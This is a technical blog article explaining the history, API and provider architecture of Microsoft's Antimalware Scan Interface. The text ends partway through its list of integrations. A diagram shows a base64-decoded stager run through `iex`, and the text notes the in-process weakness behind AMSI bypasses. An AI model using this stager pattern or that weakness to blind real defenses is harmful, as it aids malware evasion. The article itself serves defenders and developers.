&lt;p&gt;No signature for this exact payload existed yesterday. The defender never read the document, never broke the encryption, and never emulated PowerShell. So how did it see the cleartext?&lt;/p&gt;
&lt;p&gt;The answer is a seven-function Win32 API called the Antimalware Scan Interface [@amsi-portal], or AMSI, and it is the single most consequential malware-defense primitive Microsoft has shipped since &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt;. AMSI is the only Windows primitive that scans what the script engine actually decided to run, after every layer of obfuscation has been undone, and before the engine commits to running it.&lt;/p&gt;

A versatile Win32 interface standard that lets applications and services pass the post-deobfuscation buffer they are about to execute to any registered antimalware product on the machine. AMSI ships in `amsi.dll` and is integrated into PowerShell, Windows Script Host, Office VBA, Excel 4.0 macros, .NET Framework 4.8, WMI, and User Account Control, among other hosts [@amsi-portal][@msec-xlm-amsi-2021][@amsi-on-mdav].
&lt;p&gt;This article is for four audiences. Windows application developers who want to know how to integrate AMSI without introducing the usual four bugs. Detection engineers who want to know what AMSI emits, where, and how to hunt across it. Red-team operators who want to know which 2016-era bypasses still work in 2026 and which generate so much telemetry they are not worth the risk. AV and EDR vendors who want to register their own provider and not get out-competed by the default one.&lt;/p&gt;
&lt;p&gt;To understand how AMSI works, we have to understand why the 25 years of antivirus that preceded it could not.The 200-millisecond figure in the hook is approximate. Microsoft&apos;s August 2020 disclosure of Defender&apos;s pair-of-classifiers architecture [@msec-amsi-ml-2020] describes &quot;performance-optimized&quot; on-endpoint classifiers that hand off to the cloud only when content is classified as suspicious. The 200 ms in the scene above includes that cloud round trip.&lt;/p&gt;
&lt;h2&gt;2. Why Static AV Failed: 25 Years of the Obfuscation Arms Race&lt;/h2&gt;
&lt;p&gt;Consider a benign one-liner:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Write-Host &apos;pwnd!&apos;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A signature on that exact byte string catches the lazy attacker, and only the lazy attacker. The next attacker writes:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Write-Host (&apos;pwn&apos; + &apos;d!&apos;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The signature dies. So the defender starts emulating expression-evaluation; the attacker switches to &lt;code&gt;Invoke-Expression&lt;/code&gt; of a concatenated string; the defender starts emulating &lt;code&gt;Invoke-Expression&lt;/code&gt;; the attacker base64-encodes the inner script; the defender starts decoding base64 strings; the attacker XORs the base64 against a key cached in a worksheet cell; and at some point in this regress the antivirus engine is, in effect, a re-implementation of PowerShell, except slower, more buggy, and one Patch Tuesday behind. Lee Holmes called out the dead end explicitly in his June 9, 2015 disclosure: at the obfuscated leaf of this regress, &quot;we&apos;re generally past what antivirus engines will emulate or detect, so we won&apos;t necessarily detect what this script is actually doing,&quot; and even where a defender writes a signature for an obfuscator&apos;s pattern, &quot;a signature for it would generate an unacceptable number of false positives&quot; [@holmes-2015-wayback].&lt;/p&gt;
&lt;p&gt;The ladder was not theoretical. It was the operating reality of script-borne malware for 20 years.&lt;/p&gt;
&lt;p&gt;In 1995, WM/Concept [@wiki-concept] became the first widely propagated Word macro virus and established the scriptable-host-as-malware-surface architecture: a benign-looking document carrying executable VBA inside it. On May 4, 2000, a 10 KB VBScript called ILOVEYOU [@wiki-iloveyou] ran through Windows Script Host on roughly 10 percent of all internet-connected computers and caused an estimated US$10 to $15 billion in damages. ILOVEYOU made the architectural diagnosis unmistakable: built-in script engines are a malware-execution surface that defenders cannot wish away.&lt;/p&gt;
&lt;p&gt;By 2014, the surface had matured into a thriving offensive tradecraft: PowerSploit, PowerView, Invoke-Mimikatz, and the Empire C2 framework all ran fileless inside &lt;code&gt;powershell.exe&lt;/code&gt; memory after deobfuscation. On-disk antivirus saw only the encoded wrapper, not the deobfuscated payload that actually ran.&lt;/p&gt;
&lt;p&gt;Daniel Bohannon would close the file on signature-based defenses publicly at DerbyCon 6.0 on September 25, 2016 with Invoke-Obfuscation [@invoke-obfuscation], a PowerShell obfuscator that automated the regress above and turned every public-script signature into a one-bug-away walking target. Bohannon&apos;s release was a refutation, not a tool: it showed that any defender path that pattern-matched on obfuscation artifacts was a path to an unbounded backlog.&lt;/p&gt;
&lt;p&gt;The diagnosis that Holmes named in 2015 and that Bohannon proved a year later is structural. Detection must happen &lt;em&gt;after&lt;/em&gt; deobfuscation (so the obfuscation does not hide the payload), &lt;em&gt;before&lt;/em&gt; execution (so the detector can still refuse), and &lt;em&gt;in the engine that did the deobfuscation&lt;/em&gt; (because only that engine ever holds the deobfuscated bytes). In 2014, no Windows API did that. The next ten years are the story of building one.&lt;/p&gt;
&lt;h2&gt;3. The Pre-AMSI Patchwork&lt;/h2&gt;
&lt;p&gt;Before AMSI, Microsoft and the AV industry shipped four partial answers. Each one closed some of the gap. None closed all of it, because each one was wedged at the wrong place in the pipeline. Here is the timeline of what was tried, when, and what each attempt missed.&lt;/p&gt;

gantt
    title Pre-AMSI script-malware defense timeline
    dateFormat YYYY-MM
    axisFormat %Y&lt;pre&gt;&lt;code&gt;section Threats
WM/Concept (Word macro)        :done, threat1, 1995-08, 1825d
ILOVEYOU (WSH+VBScript)        :done, threat2, 2000-05, 1d
Fileless PowerShell era        :done, threat3, 2014-01, 730d
Invoke-Obfuscation release     :crit, threat4, 2016-09-25, 1d

section Defenses
IOfficeAntiVirus (file-open)   :defense1, 1997-01, 6570d
Module Logging Event 4103      :defense2, 2012-08, 1095d
Script Block Logging 4104      :defense3, 2015-07-29, 365d
AMSI in PowerShell 5.0         :crit, defense4, 2015-07-29, 1d
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first attempt was &lt;code&gt;IOfficeAntiVirus&lt;/code&gt;, a COM interface Office 97 introduced in 1997 and that Office 2000 through Office 2010 carried forward. AV products implemented the interface; Office called into it at file-open time. The interface saw the document on disk, before VBA ran. It defeated the 1995-era macro virus that arrived with its payload literal in the document body. It defeated nothing once the VBA runtime started doing AutoOpen-time &lt;code&gt;Application.Run&lt;/code&gt; of strings decoded from cells, because the decoded string was never on disk. The Office 365 Threat Research team&apos;s 2018 retrospective on the limitation [@msec-vba-amsi-2018] is direct: file-open AV does not see what the VBA runtime decides to run at runtime.&lt;/p&gt;
&lt;p&gt;The second attempt was PowerShell module logging, shipped in PowerShell 3.0 in 2012 [@wiki-powershell] as Event ID 4103. It records, after the fact, that a cmdlet ran with a given parameter binding [@ps-logging-windows]. It is forensic, not preventive: by the time Event 4103 is in the Windows Event Log, the cmdlet has already returned. And it records the bound parameters, not the contents of &lt;code&gt;Invoke-Expression&lt;/code&gt;&apos;s argument string, so it sees the call but not the payload.&lt;/p&gt;
&lt;p&gt;The third attempt, shipped on July 29, 2015 alongside Windows 10 1507 and PowerShell 5.0, was Script Block Logging [@ps-logging-windows]. Script Block Logging emits Event ID 4104 with the deobfuscated script block, captured from inside the PowerShell parser on its way to the executor. This is the right artifact at the right moment in terms of &lt;em&gt;what&lt;/em&gt; it sees, but the wrong relationship in terms of &lt;em&gt;what it can do with what it sees&lt;/em&gt;: Event 4104 is asynchronous and observation-only. It cannot refuse the script that produced it. It can only tell the SOC what ran, after it ran.&lt;/p&gt;

A PowerShell 5.0 feature that records every deobfuscated script block to the `Microsoft-Windows-PowerShell/Operational` event log channel as Event 4104. It is a post-hoc forensic record: it captures the cleartext after the parser has emitted it on its way to the executor, but the executor still runs the script [@ps-logging-windows].
&lt;p&gt;The fourth attempt was the antivirus industry&apos;s own response to the gap: bring the script-engine emulators in-house. Implement a JScript emulator inside the AV engine, a VBScript emulator inside the AV engine, a PowerShell emulator inside the AV engine. Run the obfuscated source through your private emulator and inspect what comes out. This was the regress Holmes described as &quot;fragile&quot; in 2015. Every new feature in every shipped engine version was a maintenance bill the AV vendor had to pay. PowerShell shipped a new release every couple of years; JScript varied across IE6/IE7/IE8/Edge/WSH; VBScript varied across WSH and Office. The half-life of any one emulator was short.&lt;/p&gt;
&lt;p&gt;Lee Holmes summarized the dead end in one sentence in his June 9, 2015 post: &quot;antimalware software starts to do basic language emulation,&quot; but &quot;this is a fairly fragile approach&quot; [@holmes-2015-wayback]. The next paragraph in this article is the same paragraph in his.&lt;/p&gt;
&lt;h2&gt;4. The 2015 Eureka: Lee Holmes and the Birth of AMSI&lt;/h2&gt;
&lt;p&gt;On June 9, 2015, Lee Holmes published &lt;em&gt;Windows 10 to Offer Application Developers New Malware Defenses&lt;/em&gt; [@holmes-2015-wayback] on the Microsoft Security Blog. It is the most important malware-defense blog post Microsoft has ever shipped. The same day, Holmes also published &lt;em&gt;PowerShell the Blue Team&lt;/em&gt; [@holmes-blue-team], which named the assume-breach mindset that made AMSI&apos;s design possible.&lt;/p&gt;
&lt;p&gt;The architectural fix Holmes named is the one the previous section&apos;s frustration sets up. Applications hand the post-deobfuscation buffer to AMSI. AMSI hands it to a registered antimalware provider. The provider returns a verdict. If the verdict is &quot;malware,&quot; the application refuses to execute the buffer. The whole exchange happens synchronously, in the calling process, before the engine commits.&lt;/p&gt;

While the malicious script might go through several passes of deobfuscation, it ultimately needs to supply the scripting engine with plain, unobfuscated code.&lt;p&gt;-- Lee Holmes, Microsoft Security Blog, June 9, 2015
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The same observation appears verbatim on the live Microsoft Learn &lt;code&gt;how-amsi-helps&lt;/code&gt; page [@amsi-howto], which carries Holmes 2015&apos;s argument forward in Microsoft&apos;s current documentation: &quot;Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code.&quot; The dual primary-source anchor makes the citation durable against future Wayback rot.&lt;/p&gt;
&lt;p&gt;That one sentence is the design of AMSI in compressed form. The defender stops trying to reason about the obfuscated source. It reasons about what the engine decided to run. The engine&apos;s deobfuscation work is now the defender&apos;s free lunch.&lt;/p&gt;
&lt;p&gt;The release vehicle was Windows 10 1507 on July 29, 2015, paired with PowerShell 5.0 [@wiki-win10-versions]. The companion piece, &quot;PowerShell the Blue Team&quot; [@holmes-blue-team], framed the broader assume-breach posture: &quot;What did they do? What systems did they connect to? Was any dynamic code invoked, and what was it?&quot; The trio of features Holmes shipped that day -- AMSI, Script Block Logging, and the over-the-shoulder transcripts -- was designed to answer those three questions together.The companion &quot;PowerShell heart the Blue Team&quot; devblogs post is not optional reading if you want the full context. Holmes published the two posts on the same day for a reason: AMSI is the synchronous-blocking sibling, Script Block Logging is the forensic sibling, and Constrained Language Mode is the policy-denial sibling. The trio is co-designed [@holmes-blue-team].&lt;/p&gt;
&lt;p&gt;The architectural insight that closed the loop is small to state and large to absorb. For 20 years the AV industry had been arguing about what to &lt;em&gt;scan&lt;/em&gt;. Holmes pointed out that the answer was about &lt;em&gt;when&lt;/em&gt; to scan. The naive on-disk and on-event-log approaches had failed not because their pattern matching was poor but because they were inspecting the wrong artifact at the wrong moment. The only software that ever holds the deobfuscated bytes is the engine that will execute them. The only moment that artifact exists is the moment just before the executor commits. The only place a defender can stand and see the buffer is inside that engine&apos;s process.&lt;/p&gt;
&lt;p&gt;That is the answer Holmes named, and it is the answer Microsoft has spent the last ten years implementing across seven runtimes and defending against six bypass eras. The next section is the architecture of what Holmes named.&lt;/p&gt;
&lt;h2&gt;5. The AMSI Architecture: Two API Surfaces, One Provider Model&lt;/h2&gt;
&lt;p&gt;AMSI is two API surfaces (flat C and COM) and one provider model. The flat-C surface is what script-engine hosts call; the COM surface is what AV providers implement. Both surfaces converge on the same &lt;code&gt;amsi.dll&lt;/code&gt;, and &lt;code&gt;amsi.dll&lt;/code&gt; runs in the calling process. Here is the full hot path for one PowerShell command.&lt;/p&gt;

sequenceDiagram
    autonumber
    participant User
    participant PS as powershell.exe
    participant AU as AmsiUtils.ScanContent
    participant AD as amsi.dll
    participant MP as MpOav.dll (in-process)
    participant ME as MsMpEng.exe (PPL)&lt;pre&gt;&lt;code&gt;User-&amp;gt;&amp;gt;PS: iex ([Convert]::FromBase64String($stager))
PS-&amp;gt;&amp;gt;PS: tokenize, expand, deobfuscate
PS-&amp;gt;&amp;gt;AU: ScanContent(buf, name, session)
AU-&amp;gt;&amp;gt;AD: AmsiScanBuffer(ctx, buf, len, name, session, out result)
AD-&amp;gt;&amp;gt;MP: IAntimalwareProvider::Scan(stream)
MP-&amp;gt;&amp;gt;ME: local RPC: scan(stream)
ME--&amp;gt;&amp;gt;MP: AMSI_RESULT_DETECTED (&amp;gt;= 32768)
MP--&amp;gt;&amp;gt;AD: HRESULT S_OK, result set
AD--&amp;gt;&amp;gt;AU: AMSI_RESULT_DETECTED
AU--&amp;gt;&amp;gt;PS: AmsiResultIsMalware(result) == TRUE
PS--&amp;gt;&amp;gt;User: ParseException: script content is malicious
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;5.1 The Win32 flat-C API&lt;/h3&gt;
&lt;p&gt;The flat-C surface is seven functions, declared in &lt;code&gt;amsi.h&lt;/code&gt;, exported from &lt;code&gt;amsi.dll&lt;/code&gt;, with minimum support Windows 10 / Windows Server 2016 [@amsi-scanbuffer]. A host typically calls them in this order:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;AmsiInitialize(LPCWSTR appName, HAMSICONTEXT *amsiContext)&lt;/code&gt; once at startup. The &lt;code&gt;appName&lt;/code&gt; string identifies the host: PowerShell passes &lt;code&gt;&quot;PowerShell_&amp;lt;GUID&amp;gt;&quot;&lt;/code&gt;, .NET passes &lt;code&gt;&quot;DotNet&quot;&lt;/code&gt;, Office passes its application name [@amsi-initialize]. The string later surfaces in telemetry as &lt;code&gt;DeviceEvents.AmsiProcessName&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AmsiOpenSession(HAMSICONTEXT, HAMSISESSION *session)&lt;/code&gt; per logical user command. The session handle is a correlation primitive: multiple &lt;code&gt;AmsiScanBuffer&lt;/code&gt; calls inside one session let the provider re-join partial deobfuscations into one decision [@amsi-opensession].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AmsiScanBuffer(ctx, buffer, length, contentName, session, &amp;amp;result)&lt;/code&gt; per buffer. This is the hot path. &lt;code&gt;contentName&lt;/code&gt; is a human-readable label the SOC analyst will see [@amsi-scanbuffer].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AmsiResultIsMalware(result)&lt;/code&gt; to interpret the out parameter. The macro evaluates to non-zero when the AMSI_RESULT is at or above 32768 [@amsi-resultismalware].&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AmsiCloseSession&lt;/code&gt; to release the session handle.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AmsiUninitialize&lt;/code&gt; at shutdown.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The seventh function, &lt;code&gt;AmsiScanString&lt;/code&gt;, is a thin wrapper that takes a wide-character string instead of a buffer-plus-length pair. Microsoft replaced PowerShell&apos;s &lt;code&gt;AmsiScanString&lt;/code&gt; call site with &lt;code&gt;AmsiScanBuffer&lt;/code&gt; in Windows 10 1709 as part of the response to the first CyberArk in-memory patch attack [@cyberark-redux]; we will return to that in §8.&lt;/p&gt;

The flat-C Win32 function any AMSI-aware host calls to submit a buffer for scanning. Signature: `HRESULT AmsiScanBuffer(HAMSICONTEXT amsiContext, PVOID buffer, ULONG length, LPCWSTR contentName, HAMSISESSION amsiSession, AMSI_RESULT *result)`. Returns S_OK on a completed scan; the verdict is delivered through the `result` out parameter. Minimum support Windows 10 desktop / Windows Server 2016 [@amsi-scanbuffer].
&lt;p&gt;The &lt;code&gt;AMSI_RESULT&lt;/code&gt; enumeration is the interface contract for verdicts. The values are:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th align=&quot;right&quot;&gt;Value&lt;/th&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Semantics&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;0&lt;/td&gt;
&lt;td&gt;AMSI_RESULT_CLEAN&lt;/td&gt;
&lt;td&gt;Known clean&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;1&lt;/td&gt;
&lt;td&gt;AMSI_RESULT_NOT_DETECTED&lt;/td&gt;
&lt;td&gt;Unknown but not malicious&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;16384 (0x4000)&lt;/td&gt;
&lt;td&gt;AMSI_RESULT_BLOCKED_BY_ADMIN_START&lt;/td&gt;
&lt;td&gt;Policy block (range start)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;20479 (0x4FFF)&lt;/td&gt;
&lt;td&gt;AMSI_RESULT_BLOCKED_BY_ADMIN_END&lt;/td&gt;
&lt;td&gt;Policy block (range end)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td align=&quot;right&quot;&gt;32768 (0x8000)&lt;/td&gt;
&lt;td&gt;AMSI_RESULT_DETECTED&lt;/td&gt;
&lt;td&gt;Provider verdict: malicious; &lt;code&gt;AmsiResultIsMalware&lt;/code&gt; true&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Any return value at or above 32768 is malware; values 16384 to 20479 are administrative policy blocks (e.g. AppLocker / &lt;a href=&quot;https://paragmali.com/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/&quot; rel=&quot;noopener&quot;&gt;WDAC&lt;/a&gt;), and values 0 and 1 are negative results [@amsi-result-enum]. The split between 16384 and 32768 lets a host distinguish &quot;the AV refused this&quot; from &quot;policy refused this,&quot; which lets the host display different error messages.&lt;/p&gt;
&lt;h3&gt;5.2 The COM surface&lt;/h3&gt;
&lt;p&gt;For streamable content (Office macros, .NET assemblies loaded from memory, large IM payloads), the flat-C buffer-plus-length call is the wrong abstraction. AMSI&apos;s COM surface, &lt;code&gt;IAmsiStream&lt;/code&gt; plus &lt;code&gt;IAntimalwareProvider&lt;/code&gt;, lets the host hand a stream callback to the provider and lets the provider pull as much content as it wants [@amsi-iantimalware]. The reference implementation is in Microsoft&apos;s Windows-classic-samples AmsiProvider [@amsi-sample] repository.&lt;/p&gt;
&lt;p&gt;Rule of thumb: COM/stream for streamable content, flat-C for one-shot buffers. Both end up at the same provider through the same in-process load.&lt;/p&gt;
&lt;h3&gt;5.3 The provider model&lt;/h3&gt;
&lt;p&gt;AMSI providers are in-process COM servers. Registration writes two registry trees [@amsi-devaudience]:&lt;/p&gt;

flowchart TD
    A[Provider DLL: vendor implements IAntimalwareProvider] --&amp;gt; B[regsvr32 vendor.dll]
    B --&amp;gt; C[&quot;HKLM Software Classes CLSID {CLSID} InprocServer32 = vendor.dll&quot;]
    B --&amp;gt; D[&quot;HKLM Software Classes CLSID {CLSID} InprocServer32 ThreadingModel = Both&quot;]
    B --&amp;gt; E[&quot;HKLM Software Microsoft AMSI Providers {CLSID} = present&quot;]
    C --&amp;gt; F[amsi.dll AmsiInitialize]
    D --&amp;gt; F
    E --&amp;gt; F
    F --&amp;gt; G[CoCreateInstance for each registered CLSID]
    G --&amp;gt; H[Provider loaded in-process; called on every AmsiScanBuffer]
&lt;p&gt;The first tree, &lt;code&gt;HKLM\SOFTWARE\Classes\CLSID\{CLSID}&lt;/code&gt;, is standard COM. It names the provider DLL and the ThreadingModel (which must be &lt;code&gt;Both&lt;/code&gt;; marshaling proxies would defeat the in-process performance assumption). The second tree, &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\Providers\{CLSID}&lt;/code&gt;, is the AMSI-specific opt-in. &lt;code&gt;amsi.dll&lt;/code&gt; enumerates the Providers subkey at &lt;code&gt;AmsiInitialize&lt;/code&gt; time, calls &lt;code&gt;CoCreateInstance&lt;/code&gt; for each one in-process, and then calls each provider on every subsequent &lt;code&gt;AmsiScanBuffer&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Two security mitigations have hardened that load over time. Windows 10 1709 (October 17, 2017) tightened the loader rules: provider DLLs must &lt;code&gt;LoadLibrary&lt;/code&gt; their dependencies with full paths, or the DLL hijack mitigations will refuse to satisfy unqualified loads [@amsi-devaudience]. Windows 10 1903 (May 21, 2019) added an optional Authenticode signing check: when &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\FeatureBits&lt;/code&gt; is set to &lt;code&gt;0x2&lt;/code&gt;, unsigned provider DLLs are refused [@amsi-iantimalware].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you ship an AMSI provider, Authenticode-sign the provider DLL. Windows 10 1903 introduced an opt-in signing check at &lt;code&gt;HKLM\SOFTWARE\Microsoft\AMSI\FeatureBits = 0x2&lt;/code&gt;. Several large enterprise customers set that bit, and unsigned provider DLLs will silently refuse to load on those machines [@amsi-iantimalware].&lt;/p&gt;
&lt;/blockquote&gt;

An in-process COM server (DLL) that implements `IAntimalwareProvider` and is registered under two registry trees: the standard COM CLSID tree under `HKLM\Software\Classes\CLSID\{CLSID}` and the AMSI-specific opt-in tree under `HKLM\Software\Microsoft\AMSI\Providers\{CLSID}`. `amsi.dll` loads every registered provider into the scanning host&apos;s process at `AmsiInitialize` time [@amsi-devaudience].
&lt;p&gt;The &lt;code&gt;Both&lt;/code&gt; threading model is mandatory for AMSI providers. AMSI calls into the provider on whatever thread the host happens to be running, and marshaling proxies would add cross-apartment round trips that destroy the in-process performance assumption [@amsi-devaudience].&lt;/p&gt;
&lt;h3&gt;5.4 The default provider: MpOav.dll&lt;/h3&gt;
&lt;p&gt;Microsoft Defender&apos;s AMSI provider is &lt;code&gt;MpOav.dll&lt;/code&gt;. CLSID &lt;code&gt;{2781761E-28E0-4109-99FE-B9D127C57AFE}&lt;/code&gt;. Path &lt;code&gt;%ProgramData%\Microsoft\Windows Defender\Platform\&amp;lt;version&amp;gt;\MpOav.dll&lt;/code&gt; [@redcanary-amsi]. It loads in-process to the scanning application: into &lt;code&gt;powershell.exe&lt;/code&gt;, into &lt;code&gt;winword.exe&lt;/code&gt;, into &lt;code&gt;wscript.exe&lt;/code&gt;. It does not do the heavy lifting; it bridges out to &lt;code&gt;MsMpEng.exe&lt;/code&gt; via local RPC for the signature engine, cloud reputation lookup, and the on-endpoint machine-learning model.&lt;/p&gt;

Microsoft Defender&apos;s AMSI provider DLL, located at `%ProgramData%\Microsoft\Windows Defender\Platform\\MpOav.dll`. Loaded in-process to the scanning application; bridges to `MsMpEng.exe` via local RPC for the heavy-lifting scan [@redcanary-amsi].
&lt;p&gt;&lt;code&gt;MpOav.dll&lt;/code&gt; lives in the scanning host&apos;s address space (&lt;code&gt;powershell.exe&lt;/code&gt;, &lt;code&gt;winword.exe&lt;/code&gt;, ...), not in &lt;code&gt;MsMpEng.exe&lt;/code&gt;. Defender&apos;s &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt; hardening protects &lt;code&gt;MsMpEng.exe&lt;/code&gt;&apos;s process, but it does &lt;em&gt;not&lt;/em&gt; protect the AMSI provider DLL that gets loaded into PowerShell. That asymmetry is the basis of every in-process bypass in §8 [@redcanary-amsi].&lt;/p&gt;
&lt;h3&gt;5.5 Sessions, correlation, content names&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;HAMSISESSION&lt;/code&gt; handle returned by &lt;code&gt;AmsiOpenSession&lt;/code&gt; is the correlation primitive. If a single PowerShell command produces three deobfuscation steps that yield three &lt;code&gt;AmsiScanBuffer&lt;/code&gt; calls, sharing one session across all three lets the provider join them: &quot;I just saw a base64 alphabet, then a key-rotation pattern, then &lt;code&gt;Invoke-Mimikatz&lt;/code&gt;. Verdict: malicious. Reason: the three together are the obfuscation chain.&quot; The session-shared verdict is more informative than any single buffer would be in isolation [@amsi-opensession].&lt;/p&gt;

An opaque correlation handle returned by `AmsiOpenSession`. Multiple `AmsiScanBuffer` calls that share a `HAMSISESSION` value belong to one logical user command; the provider may re-join their partial deobfuscations into a single verdict [@amsi-opensession].
&lt;p&gt;The &lt;code&gt;contentName&lt;/code&gt; argument to &lt;code&gt;AmsiScanBuffer&lt;/code&gt; is what the SOC analyst sees in &lt;code&gt;DeviceEvents.FileName&lt;/code&gt; at hunt time. Hosts that pass a meaningful &lt;code&gt;contentName&lt;/code&gt; (the script-block ID, the assembly&apos;s friendly name, the URL the macro came from) give the SOC the breadcrumb they need to triage; hosts that pass a random GUID or an empty string give the SOC a column of noise [@deviceevents-table].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; AMSI&apos;s value comes from running inside the same process as the script engine, because that is the only place that ever holds the deobfuscated bytes. Every weakness AMSI has also comes from running inside the same process, because anyone with code execution there can mute it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We now know what AMSI is. The next section walks every shipping integration in Windows 10 and 11, and reveals that AMSI was not, in 2015, where most Windows scripted-content malware actually ran.&lt;/p&gt;
&lt;h2&gt;6. The Call-Site Catalogue: Where AMSI Plugs Into Windows&lt;/h2&gt;
&lt;p&gt;AMSI shipped in &lt;code&gt;amsi.dll&lt;/code&gt; in 2015, but &lt;code&gt;amsi.dll&lt;/code&gt; exporting &lt;code&gt;AmsiScanBuffer&lt;/code&gt; does not scan anything by itself. It scans whatever any host process bothers to hand it. The story of AMSI between 2015 and 2021 is one host integration at a time. Here is the order they shipped.&lt;/p&gt;

gantt
    title AMSI integration by runtime
    dateFormat YYYY-MM
    axisFormat %Y&lt;pre&gt;&lt;code&gt;PowerShell 5.0          :ps, 2015-07, 3650d
Windows Script Host     :wsh, 2015-07, 3650d
Office VBA              :vba, 2018-09, 2555d
.NET Framework 4.8      :dn, 2019-04, 2555d
WMI scripting           :wmi, 2019-05, 2555d
Excel 4.0 macros (XLM)  :xlm, 2021-03, 1825d
Win11 in-memory scripts :w11, 2021-10, 1825d
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;PowerShell 5.0 (July 29, 2015)&lt;/h3&gt;
&lt;p&gt;PowerShell is the reference integration. The PowerShell host calls &lt;code&gt;System.Management.Automation.AmsiUtils.ScanContent&lt;/code&gt;, which (after a one-time check on the &lt;code&gt;amsiInitFailed&lt;/code&gt; flag and a lazy &lt;code&gt;AmsiInitialize&lt;/code&gt;) calls &lt;code&gt;AmsiNativeMethods.AmsiScanBuffer&lt;/code&gt; on the deobfuscated script block [@psa-clr-hooking]. The integration matches Holmes&apos;s design intent verbatim: the buffer handed to AMSI is the buffer the executor is about to run.&lt;/p&gt;
&lt;h3&gt;Windows Script Host (2015)&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;wscript.exe&lt;/code&gt; and &lt;code&gt;cscript.exe&lt;/code&gt;, the hosts that ran ILOVEYOU in 2000, integrate AMSI in the same release vehicle as PowerShell 5.0 [@amsi-portal]. Every JScript or VBScript source goes through &lt;code&gt;AmsiScanBuffer&lt;/code&gt; before WSH executes it, and runtime eval-style constructions (&lt;code&gt;new ActiveXObject(&apos;WScript.Shell&apos;).Run(...)&lt;/code&gt; with a dynamically built command line) get scanned at the point where the runtime resolves them.&lt;/p&gt;
&lt;h3&gt;Office VBA (September 12, 2018)&lt;/h3&gt;
&lt;p&gt;The Office VBA integration was the first non-script-engine AMSI host, and it used a new abstraction: the trigger-buffer architecture. The VBA runtime maintains a circular buffer of Win32, COM, and VBA API calls plus their arguments. When VBA observes a high-risk trigger -- &lt;code&gt;Shell&lt;/code&gt; invocation, &lt;code&gt;CreateObject(&quot;WScript.Shell&quot;)&lt;/code&gt;, &lt;code&gt;Application.Run&lt;/code&gt; of a decoded string -- it halts the macro and flushes the circular buffer through &lt;code&gt;AmsiScanBuffer&lt;/code&gt; [@amsi-howto].&lt;/p&gt;

The dispatch pattern used by Office VBA and Excel 4.0 AMSI integrations. The runtime maintains a circular buffer of API calls and arguments and flushes it through `AmsiScanBuffer` when a high-risk trigger (e.g. `CreateObject(&quot;WScript.Shell&quot;)`, `Shell()`, a file-write API) fires. The provider sees the trigger plus its prior-API context, not just one isolated call [@amsi-howto].

Office 365 client applications now integrate with Antimalware Scan Interface (AMSI), enabling antivirus and other security solutions to scan macros and other scripts at runtime to check for malicious behavior.&lt;p&gt;-- Microsoft Office 365 Threat Research, September 12, 2018
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;The Office team published the design in the September 12, 2018 announcement [@msec-vba-amsi-2018]. The architectural payoff: a provider sees not just one trigger call but the macro&apos;s prior-API context, which is what distinguishes &lt;code&gt;Application.Run(&quot;notepad.exe&quot;)&lt;/code&gt; from &lt;code&gt;Application.Run(&amp;lt;base64-decoded-PowerShell&amp;gt;)&lt;/code&gt;.&lt;/p&gt;
&lt;h3&gt;.NET Framework 4.8 (April 2019)&lt;/h3&gt;
&lt;p&gt;The next gap was in-memory .NET. &lt;code&gt;Assembly.Load(byte[])&lt;/code&gt;, the load path Cobalt Strike&apos;s &lt;code&gt;execute-assembly&lt;/code&gt; command and Sliver&apos;s SharpLoader use, did not produce a file on disk and did not generate any of the file-system events on-disk AV depended on. .NET Framework 4.8 closed it: &quot;In previous versions of .NET Framework, Windows Defender or third-party antimalware software would automatically scan all assemblies loaded from disk for malware. However, assemblies loaded from elsewhere, such as by using &lt;code&gt;Assembly.Load(byte[])&lt;/code&gt;, would not be scanned ... .NET Framework 4.8 on Windows 10 triggers scans for those assemblies by Windows Defender and many other antimalware solutions that implement the Antimalware Scan Interface&quot; [@dotnet-48].&lt;/p&gt;
